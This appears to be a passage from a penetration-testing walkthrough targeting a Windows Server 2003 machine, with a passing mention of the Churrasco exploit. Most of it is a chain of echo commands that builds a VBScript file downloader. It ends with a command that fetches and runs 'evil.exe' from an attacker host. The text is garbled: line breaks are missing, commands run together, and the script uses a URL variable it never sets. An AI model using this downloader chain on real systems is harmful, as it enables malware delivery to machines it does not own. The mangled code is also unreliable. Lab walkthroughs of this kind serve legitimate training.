This is a really old version of Windows that is outdated and vulnerable to loads of exploits. One exploit is the Churrasco exploit, which works on Windows Server 2003 machines. However, because this machine was so old, it was hard to transfer files over to it using conventional Windows methods.
So, we would need to create a wget binaruy using vbs.
echo StrFile = WScript.Arguments.Item(1) >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_DEFAULT =0>> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_PRECONFIG =0>> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_DIRECT =1>> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_PROXY =2>> wget.vbsecho Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbsecho Err.Clear >> wget.vbsecho Set http = Nothing >> wget.vbsecho Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbsecho If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbsecho If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbsecho If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbsecho http.Open "GET",strURL,False >> wget.vbsecho http.Send >> wget.vbsecho varByteArray = http.ResponseBody >> wget.vbsecho Set http = Nothing >> wget.vbsecho Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbsecho Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbsecho strData ="">> wget.vbsecho strBuffer ="">> wget.vbsecho For lngCounter =0 to UBound(varByteArray) >> wget.vbsecho ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter +1,1))) >> wget.vbsecho Next >> wget.vbsecho ts.Close >> wget.vbs# Afterwards, you can run this.cscript wget.vbs http://192.168.10.5/evil.exeevil.exe
